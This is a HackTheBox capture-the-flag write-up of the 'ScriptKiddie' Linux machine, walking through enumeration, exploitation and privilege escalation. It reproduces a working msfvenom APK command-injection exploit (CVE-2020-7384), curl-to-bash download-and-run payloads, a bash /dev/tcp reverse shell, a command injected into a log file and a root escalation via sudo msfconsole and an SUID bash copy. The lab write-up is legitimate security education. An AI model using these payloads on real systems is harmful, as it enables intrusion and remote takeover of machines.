imported>Aghanim at 19:21, 31 January 2022

2022-01-31T19:21:27Z

New page

{{Infobox WriteUp
| name = ScriptKiddie
| platform = HackTheBox
| os = Linux
| difficulty = Easy
| techniques = msfvenom Template Injection
}}

[[File:2022-01-image-126.png|thumb]]

Even though the name of this machine implies that we're going to do something easy, it was the opposite. With a hard enumeration phase, there was also horizontal movement through abusing a scritp '''pwn''''s home directory. After that getting root was abusing the fact that the user pwn could run metasploit as root.

----

== Enumeration ==

I'll start with a NMAP scan.

<syntaxhighlight lang="bash">
┌──(root💀kali)-[/home/aghanim/Desktop/HTB]
└─# nmap -sC -sV -p- --min-rate 10000 10.10.10.226 -oN nmap.ver
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-25 14:19 EST
Nmap scan report for 10.10.10.226
Host is up (0.031s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)
| 256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)
|_ 256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)
5000/tcp open http Werkzeug httpd 0.16.1 (Python 3.8.5)
|_http-title: k1d'5 h4ck3r t00l5
|_http-server-header: Werkzeug/0.16.1 Python/3.8.5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.64 seconds

</syntaxhighlight>

Only two ports open.

'''Port 22 '''and '''port 5000'''. Werkzeug httpd, which is a web application, is running on port 5000.

[[File:2022-01-Pasted-image-20220125202732.png|thumb]]

=== Vulnerable msfvenom ===

After alot of enumeration, I found that msfvenom running on the web application is vulnerable to command injection.

[https://github.com/justinsteven/advisories/blob/master/2020_metasploit_msfvenom_apk_template_cmdi.md CVE-2020-7384]

>
There is a command injection vulnerability in <code>msfvenom</code> when using a crafted APK file as an Android payload template.

On the website I've linked above there is a PoC that I modified to give me a reverse shell on my machine.

<syntaxhighlight lang="python">
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/scriptkiddie]
└─# cat 49491.py
# Exploit Title: Metasploit Framework 6.0.11 - msfvenom APK template command injection
# Exploit Author: Justin Steven
# Vendor Homepage: https://www.metasploit.com/
# Software Link: https://www.metasploit.com/
# Version: Metasploit Framework 6.0.11 and Metasploit Pro 4.18.0
# CVE : CVE-2020-7384

#!/usr/bin/env python3
import subprocess
import tempfile
import os
from base64 import b64encode

# Change me
payload = 'curl http://10.10.14.17:9000/shell.sh | bash'

# b64encode to avoid badchars (keytool is picky)
payload_b64 = b64encode(payload.encode()).decode()
dname = f"CN='|echo {payload_b64} | base64 -d | sh #"

print(f"[+] Manufacturing evil apkfile")
print(f"Payload: {payload}")
print(f"-dname: {dname}")
print()

tmpdir = tempfile.mkdtemp()
apk_file = os.path.join(tmpdir, "evil.apk")
empty_file = os.path.join(tmpdir, "empty")
keystore_file = os.path.join(tmpdir, "signing.keystore")
storepass = keypass = "password"
key_alias = "signing.key"

# Touch empty_file
open(empty_file, "w").close()

# Create apk_file
subprocess.check_call(["zip", "-j", apk_file, empty_file])

# Generate signing key with malicious -dname
subprocess.check_call(["keytool", "-genkey", "-keystore", keystore_file, "-alias", key_alias, "-storepass", storepass,
"-keypass", keypass, "-keyalg", "RSA", "-keysize", "2048", "-dname", dname])

# Sign APK using our malicious dname
subprocess.check_call(["jarsigner", "-sigalg", "SHA1withRSA", "-digestalg", "SHA1", "-keystore", keystore_file,
"-storepass", storepass, "-keypass", keypass, apk_file, key_alias])

print()
print(f"[+] Done! apkfile is at {apk_file}")
print(f"Do: msfvenom -x {apk_file} -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o /dev/null")

</syntaxhighlight>

So what this script does is it first encodes the payload with base64 to avoid bad characters. It then creates the apk file, and generate a signing key, which is signs the apk with.

I used the payload

<syntaxhighlight lang="python">
payload = 'curl http://10.10.14.17:9000/shell.sh | bash'
</syntaxhighlight>

In the '''shell.sh '''I've setup a standard bash TCP reverse shell.

<syntaxhighlight lang="bash">
bash -i >& /dev/tcp/10.10.14.17/4444 0>&1

</syntaxhighlight>

I start a http server on port 9000 and generate a payload on the webapplication.

[[File:2022-01-image-124.png|thumb]]

I see that the shell is downloaded.

<syntaxhighlight lang="bash">
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/scriptkiddie]
└─# python3 -m http.server 9000
Serving HTTP on 0.0.0.0 port 9000 (http://0.0.0.0:9000/) ...
10.10.10.226 - - [31/Jan/2022 13:43:53] "GET /shell.sh HTTP/1.1" 200 -
10.10.10.226 - - [31/Jan/2022 13:44:28] "GET /shell.sh HTTP/1.1" 200 -
10.10.10.226 - - [31/Jan/2022 13:45:26] "GET /shell.sh HTTP/1.1" 200 -
10.10.10.226 - - [31/Jan/2022 13:46:13] "GET /shell.sh HTTP/1.1" 200 -

</syntaxhighlight>

And I get a reverse shell.

<syntaxhighlight lang="bash">
┌──(root💀kali)-[/home/aghanim]
└─# nc -lvnp 4444 1 ⨯
listening on [any] 4444 ...
connect to [10.10.14.17] from (UNKNOWN) [10.10.10.226] 56898
bash: cannot set terminal process group (861): Inappropriate ioctl for device
bash: no job control in this shell
kid@scriptkiddie:~/html$ whoami
whoami
kid
kid@scriptkiddie:~/html$

</syntaxhighlight>

== Shell as pwn ==

In pwn's home directory there is a script thats called '''scanlosers.sh. '''We dont have permission to execute or edit the script.

<syntaxhighlight lang="bash">
kid@scriptkiddie:/home/pwn$ cat scanlosers.sh
#!/bin/bash

log=/home/kid/logs/hackers # variable log = dir/hackers

cd /home/pwn/ # Change dir to /home/pwn
cat $log | cut -d' ' -f3- | sort -u | while read ip; do # Open hackers, cut delimeter space in field 3 and read IP
sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" & # run the nmap scan against IP, and write error to /dev/null
done

if [[ $(wc -l $log; fi
</syntaxhighlight>

I've commented in the script to explains what happenes. So basically what happens is:

* Create a varaible '''log''' which points to '''/home/kid/logs/hackers'''. It '''cat''' the file hacker, cut delimeter space in field 3, and reads the IP. It then runs an nmap scan on the IP against the IP and writes error to /dev/null. * Then it deletes everything in hackers.

=== Why is the script there? ===

If we analyze the '''app.py '''which is located in '''/html '''we can see that running searchsploit on the webserver and type anything else than alphanumeric, it will write '''date '''and '''time '''aswell as our IP to the file '''hackers'''.

<syntaxhighlight lang="python">
def searchsploit(text, srcip):
if regex_alphanum.match(text):
result = subprocess.check_output(['searchsploit', '--color', text])
return render_template('index.html', searchsploit=result.decode('UTF-8', 'ignore'))
else:
with open('/home/kid/logs/hackers', 'a') as f:
f.write(f'[{datetime.datetime.now()}] {srcip}\n')
return render_template('index.html', sserror="stop hacking me - well hack you back")
</syntaxhighlight>

We can do a test run. Lets '''tail -f '''hackers and type something non alphanumeric in searchsploit.

[[File:2022-01-image-125.png|thumb]]

And in hackers we see.

<syntaxhighlight lang="bash">
kid@scriptkiddie:~/logs$ tail -f hackers
[2022-01-31 19:00:41.199499] 10.10.14.17
tail: hackers: file truncated

</syntaxhighlight>

It removes the input in the end so '''hackers''' is empty.

=== How to abuse this? ===

Lets try and run the script on our local machine, and add some random numbers and see what happenes.

<syntaxhighlight lang="bash">
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/scriptkiddie]
└─# cat test
123 456 789 101112

┌──(root💀kali)-[/home/aghanim/Desktop/HTB/scriptkiddie]
└─# cat test| cut -d' ' -f3-
789 101112

</syntaxhighlight>

As we explained earlier, it will cat everything after field 3. So to test to see if there is a command injection possibilty I'll do a ping against my machine. The numbers before the ping command could be anything aslong as there is two spaces there. Because the script will disregard everything before the two spaces.

<syntaxhighlight lang="bash">
kid@scriptkiddie:~/logs$ echo '1 2 ;ping 10.10.14.17#' >> hackers
</syntaxhighlight>

<syntaxhighlight lang="bash">
──(root💀kali)-[/home/aghanim]
└─# tcpdump -i tun0
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
14:06:41.029136 IP 10.10.14.17.4444 > 10.10.10.226.38940: Flags [P.], seq 2167120262:2167120263, ack 257553598, win 501, options [nop,nop,TS val 1785006364 ecr 2516665146], length 1
14:06:41.059614 IP 10.10.10.226.38940 > 10.10.14.17.4444: Flags [P.], seq 1:2, ack 1, win 502, options [nop,nop,TS val 2516687586 ecr 1785006364], length 1
14:06:41.059628 IP 10.10.14.17.4444 > 10.10.10.226.38940: Flags [.], ack 2, win 501, options [nop,nop,TS val 1785006394 ecr 2516687586], length 0
14:06:41.307286 IP 10.10.14.17.4444 > 10.10.10.226.38940: Flags [P.], seq 1:2, ack 2, win 501, options [nop,nop,TS val 1785006642 ecr 2516687586], length 1
14:06:41.337537 IP 10.10.10.226.38940 > 10.10.14.17.4444: Flags [P.], seq 2:3, ack 2, win 502, options [nop,nop,TS val 2516687864 ecr 1785006642], length 1
14:06:41.337552 IP 10.10.14.17.4444 > 10.10.10.226.38940: Flags [.], ack 3, win 501, options [nop,nop,TS val 1785006672 ecr 2516687864], length 0
14:06:41.384550 IP 10.10.14.17.4444 > 10.10.10.226.38940: Flags [P.], seq 2:3, ack 3, win 501, options [nop,nop,TS val 1785006719 ecr 2516687864], length 1
14:06:41.414975 IP 10.10.10.226.38940 > 10.10.14.17.4444: Flags [P.], seq 3:4, ack 3, win 502, options [nop,nop,TS val 2516687942 ecr 1785006719], length 1
</syntaxhighlight>

We get a response. So lets try and create a reverse shell.

First:

<syntaxhighlight lang="bash">
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/scriptkiddie]
└─# cat shell.sh
#!/bin/bash

bash -i >& /dev/tcp/10.10.14.17/6666 0>&1
</syntaxhighlight>

Second:

<syntaxhighlight lang="bash">
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/scriptkiddie]
└─# python3 -m http.server 9001
Serving HTTP on 0.0.0.0 port 9001 (http://0.0.0.0:9001/) ...
</syntaxhighlight>

Third:

<syntaxhighlight lang="bash">
kid@scriptkiddie:~/logs$ echo '1 2 ;curl 10.10.14.17:9001/shell.sh | bash #' >> hackers
</syntaxhighlight>

This will curl our shell and pipe it bash and then comment out everything after the pipe.

Fourth:

<syntaxhighlight lang="bash">
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/scriptkiddie]
└─# nc -lvnp 6666 148 ⨯ 1 ⚙
listening on [any] 6666 ...

connect to [10.10.14.17] from (UNKNOWN) [10.10.10.226] 45000
bash: cannot set terminal process group (861): Inappropriate ioctl for device
bash: no job control in this shell
pwn@scriptkiddie:~$
pwn@scriptkiddie:~$ whoami
whoami
pwn
pwn@scriptkiddie:~$
</syntaxhighlight>

And we have a connection.

== Shell as root ==

We can run '''metasploit '''as root.

<syntaxhighlight lang="bash">
pwn@scriptkiddie:/home$ sudo -l
Matching Defaults entries for pwn on scriptkiddie:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User pwn may run the following commands on scriptkiddie:
(root) NOPASSWD: /opt/metasploit-framework-6.0.9/msfconsole
</syntaxhighlight>

So we start '''metasploit''' and run whoami.

<syntaxhighlight lang="bash">
msf6 > whoami
[*] exec: whoami

root
msf6 >
</syntaxhighlight>

Greate, we're root.

To get a shell as root, there are two methods.

First:

Copy bash to tmp, set SUID bit and execute for all the users. When we execute shell with -p it will retain the permissions and give us root shell.

<syntaxhighlight lang="bash">
msf6 > irb
[*] Starting IRB shell...
[*] You are in the "framework" object

irb: warn: can't alias jobs from irb_jobs.
>> system("cp /bin/bash /tmp/shell; chmod 4777 /tmp/shell")
=> true
>> exit
msf6 > exit
pwn@scriptkiddie:/tmp$ /tmp/shell -p
shell-5.0# id
uid=1001(pwn) gid=1001(pwn) euid=0(root) groups=1001(pwn)
shell-5.0#
</syntaxhighlight>

Second:

<syntaxhighlight lang="bash">
msf6 > irb
[*] Starting IRB shell...
[*] You are in the "framework" object

irb: warn: can't alias jobs from irb_jobs.
>> system("bash")
root@scriptkiddie:/tmp#
root@scriptkiddie:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@scriptkiddie:/tmp#
</syntaxhighlight>

== What I've learned ==

* Even though Im not a programmer, understanding basic scritpting and programs is very important. * Running scripts locally to understand what is happening is a great way to test for command injection or other vulnerabilities.* Keeping software updated, like msfvenom would have prevented us from gaining access to the machine

[[Category:HackTheBox]]
[[Category:Linux]]
[[Category:Write-ups]]

Write-ups/HTB/ScriptKiddie - Revision history

imported>Aghanim at 19:21, 31 January 2022